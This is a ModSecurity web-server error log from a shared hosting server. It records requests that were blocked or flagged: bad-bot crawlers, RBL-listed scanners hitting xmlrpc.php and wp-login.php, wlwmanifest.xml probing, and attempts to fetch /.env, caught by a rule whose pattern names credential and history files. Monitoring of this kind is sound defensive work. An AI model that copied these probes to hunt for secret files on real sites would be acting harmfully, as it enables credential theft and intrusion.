[Tue May 26 15:33:56.755799 2026] [security2:error] [pid 724639:tid 724873] [client 114.119.139.115:45495] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/glorod_new/index.php"] [unique_id "ahVwDBKJRbiNp3eWdT125wAAAO0"], referer: http://glorodavionics.com/glorod_new/index.php?route=account%2Freturn%2Fadd
[Tue May 26 15:33:57.519867 2026] [security2:error] [pid 724639:tid 724837] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwDRKJRbiNp3eWdT12-gAAAMk"]
[Tue May 26 15:33:59.471722 2026] [security2:error] [pid 724639:tid 724774] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwDxKJRbiNp3eWdT13UAAAAIo"]
[Tue May 26 15:34:02.146880 2026] [security2:error] [pid 724639:tid 724836] [client 223.123.35.47:62455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwEhKJRbiNp3eWdT13qAAAAMg"]
[Tue May 26 15:34:02.147024 2026] [security2:error] [pid 724639:tid 724836] [client 223.123.35.47:62455] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwEhKJRbiNp3eWdT13qAAAAMg"]
[Tue May 26 15:34:02.461371 2026] [security2:error] [pid 724639:tid 724868] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwEhKJRbiNp3eWdT13oQAAAOg"]
[Tue May 26 15:34:03.689091 2026] [security2:error] [pid 724639:tid 724737] [remote 163.223.13.54:33242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVwExKJRbiNp3eWdT13xQAAiWE"]
[Tue May 26 15:34:03.703688 2026] [security2:error] [pid 724639:tid 724724] [remote 141.95.202.18:38066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVwExKJRbiNp3eWdT13xgAA9FQ"]
[Tue May 26 15:34:04.985094 2026] [security2:error] [pid 724639:tid 724820] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwFBKJRbiNp3eWdT134gAAALg"]
[Tue May 26 15:34:05.159424 2026] [security2:error] [pid 724639:tid 724832] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVwFBKJRbiNp3eWdT135QAAAMQ"]
[Tue May 26 15:34:05.159457 2026] [security2:error] [pid 724639:tid 724832] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVwFBKJRbiNp3eWdT135QAAAMQ"]
[Tue May 26 15:34:05.159933 2026] [security2:error] [pid 724639:tid 724818] [client 74.7.230.31:42114] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVwFBKJRbiNp3eWdT134wAAALY"]
[Tue May 26 15:34:06.204692 2026] [security2:error] [pid 724639:tid 724781] [client 176.65.139.235:52810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/.env"] [unique_id "ahVwFhKJRbiNp3eWdT14BwAAAJE"]
[Tue May 26 15:34:06.480972 2026] [security2:error] [pid 724639:tid 724838] [client 176.65.139.238:63814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "support.mosykay.com"] [uri "/.env"] [unique_id "ahVwFhKJRbiNp3eWdT14DgAAAMo"]
[Tue May 26 15:34:07.140075 2026] [security2:error] [pid 724639:tid 724836] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwFhKJRbiNp3eWdT14FAAAAMg"]
[Tue May 26 15:34:08.213757 2026] [security2:error] [pid 724639:tid 724794] [client 5.41.124.248:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwFxKJRbiNp3eWdT14OwAAAJ4"]
[Tue May 26 15:34:08.792634 2026] [security2:error] [pid 724639:tid 724797] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwGBKJRbiNp3eWdT14SwAAAKE"]
[Tue May 26 15:34:11.695201 2026] [security2:error] [pid 724639:tid 724857] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwGxKJRbiNp3eWdT14mAAAAN0"]
[Tue May 26 15:34:13.283913 2026] [security2:error] [pid 724639:tid 724835] [client 223.123.35.47:62456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwHBKJRbiNp3eWdT14xgAAAMc"]
[Tue May 26 15:34:13.284036 2026] [security2:error] [pid 724639:tid 724835] [client 223.123.35.47:62456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwHBKJRbiNp3eWdT14xgAAAMc"]
[Tue May 26 15:34:14.123899 2026] [security2:error] [pid 724639:tid 724789] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwHRKJRbiNp3eWdT142AAAAJk"]
[Tue May 26 15:34:16.395981 2026] [security2:error] [pid 724639:tid 724771] [client 45.81.136.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwIBKJRbiNp3eWdT15IwAAAIc"], referer: https://www.anujtradingco.com/
[Tue May 26 15:34:16.925955 2026] [security2:error] [pid 724639:tid 724813] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwIBKJRbiNp3eWdT15KAAAALE"]
[Tue May 26 15:34:18.196679 2026] [security2:error] [pid 724639:tid 724862] [client 45.81.136.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwIhKJRbiNp3eWdT15WgAAAOI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1233210&moderation-hash=1a615f8387f0de6b8c4f3b533c7d7ac2
[Tue May 26 15:34:18.717675 2026] [security2:error] [pid 724639:tid 724848] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwIhKJRbiNp3eWdT15YAAAANQ"]
[Tue May 26 15:34:20.589053 2026] [security2:error] [pid 724639:tid 724858] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwJBKJRbiNp3eWdT15kwAAAN4"]
[Tue May 26 15:34:22.854688 2026] [security2:error] [pid 724639:tid 724893] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwJhKJRbiNp3eWdT153gAAAQE"]
[Tue May 26 15:34:24.390153 2026] [security2:error] [pid 724639:tid 724778] [client 136.144.42.190:30715] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVwJhKJRbiNp3eWdT157QAAAI4"]
[Tue May 26 15:34:24.814437 2026] [security2:error] [pid 724639:tid 724872] [client 98.97.37.179:33474] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVwJxKJRbiNp3eWdT158wAA7C8"], referer: https://panda-eco.com
[Tue May 26 15:34:26.051696 2026] [security2:error] [pid 724639:tid 724875] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwKRKJRbiNp3eWdT16MQAAAO8"]
[Tue May 26 15:34:26.669818 2026] [security2:error] [pid 724639:tid 724836] [client 45.81.136.223:50547] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVwKhKJRbiNp3eWdT16PwAAAMg"], referer: https://anujtradingco.com
[Tue May 26 15:34:28.114797 2026] [security2:error] [pid 724639:tid 724824] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwKxKJRbiNp3eWdT16bwAAALw"]
[Tue May 26 15:34:28.647389 2026] [security2:error] [pid 724639:tid 724843] [client 223.123.35.47:62457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwLBKJRbiNp3eWdT16hgAAAM8"]
[Tue May 26 15:34:28.647502 2026] [security2:error] [pid 724639:tid 724843] [client 223.123.35.47:62457] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwLBKJRbiNp3eWdT16hgAAAM8"]
[Tue May 26 15:34:31.418717 2026] [security2:error] [pid 724639:tid 724836] [client 14.237.25.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwLxKJRbiNp3eWdT16wQAAAMg"]
[Tue May 26 15:34:32.360151 2026] [security2:error] [pid 724639:tid 724803] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwLxKJRbiNp3eWdT162AAAAKc"]
[Tue May 26 15:34:35.129227 2026] [security2:error] [pid 724639:tid 724863] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwMhKJRbiNp3eWdT17IQAAAOM"]
[Tue May 26 15:34:37.787106 2026] [security2:error] [pid 724639:tid 724856] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwNRKJRbiNp3eWdT17cwAAANw"]
[Tue May 26 15:34:39.648895 2026] [security2:error] [pid 724639:tid 724857] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwNxKJRbiNp3eWdT17owAAAN0"]
[Tue May 26 15:34:41.502836 2026] [security2:error] [pid 724639:tid 724855] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwORKJRbiNp3eWdT18GAAAANs"]
[Tue May 26 15:34:43.862784 2026] [security2:error] [pid 724639:tid 724862] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwOxKJRbiNp3eWdT18XgAAAOI"]
[Tue May 26 15:34:46.104709 2026] [security2:error] [pid 724639:tid 724829] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwPRKJRbiNp3eWdT18mgAAAME"]
[Tue May 26 15:34:48.897593 2026] [security2:error] [pid 724639:tid 724836] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwQBKJRbiNp3eWdT181AAAAMg"]
[Tue May 26 15:34:50.502327 2026] [security2:error] [pid 724639:tid 724874] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwQhKJRbiNp3eWdT18_wAAAO4"]
[Tue May 26 15:34:52.940708 2026] [security2:error] [pid 724639:tid 724877] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwRBKJRbiNp3eWdT19RAAAAPE"]
[Tue May 26 15:34:55.465073 2026] [security2:error] [pid 724639:tid 724836] [client 185.191.171.10:55202] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVwRxKJRbiNp3eWdT19jQAAAMg"]
[Tue May 26 15:34:55.465223 2026] [security2:error] [pid 724639:tid 724836] [client 185.191.171.10:55202] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVwRxKJRbiNp3eWdT19jQAAAMg"]
[Tue May 26 15:34:55.527406 2026] [security2:error] [pid 724639:tid 724860] [client 202.76.173.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwRxKJRbiNp3eWdT19hgAAAOA"]
[Tue May 26 15:34:55.729673 2026] [security2:error] [pid 724639:tid 724879] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwRxKJRbiNp3eWdT19igAAAPM"]
[Tue May 26 15:34:57.391869 2026] [security2:error] [pid 724639:tid 724874] [client 85.204.70.118:42286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVwSRKJRbiNp3eWdT19vgAAAO4"]
[Tue May 26 15:34:57.556315 2026] [security2:error] [pid 724639:tid 724805] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwSRKJRbiNp3eWdT19uwAAAKk"]
[Tue May 26 15:34:58.115274 2026] [security2:error] [pid 724639:tid 724769] [client 85.204.70.118:42300] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVwShKJRbiNp3eWdT196wAAAIU"]
[Tue May 26 15:34:58.726127 2026] [security2:error] [pid 724639:tid 724893] [client 85.204.70.118:42308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVwShKJRbiNp3eWdT1-AwAAAQE"]
[Tue May 26 15:34:59.327638 2026] [security2:error] [pid 724639:tid 724777] [client 85.204.70.118:42310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVwSxKJRbiNp3eWdT1-DwAAAI0"]
[Tue May 26 15:34:59.907164 2026] [security2:error] [pid 724639:tid 724790] [client 85.204.70.118:42314] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVwSxKJRbiNp3eWdT1-IwAAAJo"]
[Tue May 26 15:34:59.980411 2026] [security2:error] [pid 724639:tid 724783] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwSxKJRbiNp3eWdT1-GAAAAJM"]
[Tue May 26 15:35:00.541442 2026] [security2:error] [pid 724639:tid 724776] [client 85.204.70.118:42322] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVwTBKJRbiNp3eWdT1-NAAAAIw"]
[Tue May 26 15:35:00.913382 2026] [autoindex:error] [pid 724639:tid 724837] [client 205.210.31.40:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.juniorwoodies.glorodavionics.com/
[Tue May 26 15:35:01.134371 2026] [security2:error] [pid 724639:tid 724833] [client 85.204.70.118:42330] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVwTRKJRbiNp3eWdT1-SAAAAMU"]
[Tue May 26 15:35:01.712396 2026] [security2:error] [pid 724639:tid 724814] [client 85.204.70.118:59884] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVwTRKJRbiNp3eWdT1-WAAAALI"]
[Tue May 26 15:35:02.020541 2026] [security2:error] [pid 724639:tid 724769] [client 168.119.96.239:18274] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVwThKJRbiNp3eWdT1-ZgAAAIU"], referer: https://thegoodsporting.com
[Tue May 26 15:35:02.081570 2026] [security2:error] [pid 724639:tid 724646] [remote 116.204.67.185:45748] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVwShKJRbiNp3eWdT199QAAzgY"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/9c93b12bc8cba040-9c93b12bc8cba040-combined.css
[Tue May 26 15:35:02.315109 2026] [security2:error] [pid 724639:tid 724845] [client 85.204.70.118:59886] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVwThKJRbiNp3eWdT1-cAAAANE"]
[Tue May 26 15:35:02.610054 2026] [security2:error] [pid 724639:tid 724830] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwThKJRbiNp3eWdT1-agAAAMI"]
[Tue May 26 15:35:02.904145 2026] [security2:error] [pid 724639:tid 724807] [client 85.204.70.118:59902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "lagoslawntennisclub1895.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVwThKJRbiNp3eWdT1-fwAAAKs"]
